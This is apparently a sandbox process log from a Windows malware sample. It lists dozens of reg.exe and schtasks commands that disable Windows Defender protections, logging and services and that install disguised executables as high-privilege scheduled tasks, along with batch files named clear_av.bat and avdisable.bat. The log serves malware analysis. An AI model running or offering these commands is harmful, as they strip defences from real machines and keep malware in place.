reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Cookies\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eTV455KIx4.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Zlmto9DLwM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\timeout.exe

timeout /t 6 /nobreak

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NfeiSKMyn5.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\timeout.exe

timeout /t 6 /nobreak

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pbgl9PPr7s.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\timeout.exe

timeout /t 6 /nobreak

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nfin2KLgOh.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc54b846f8,0x7ffc54b84708,0x7ffc54b84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gZmmY05In2.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nAABNdhKLs.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vF7CrwxjwX.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5760 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5320 /prefetch:8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bhowVEGEG8.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LZh5ueQJla.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eR3ydISl4k.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iqKdioc4MG.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\45aGjaybPu.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HcCr6nEVp7.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Windows\ja-JP\msedge.exe'" /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

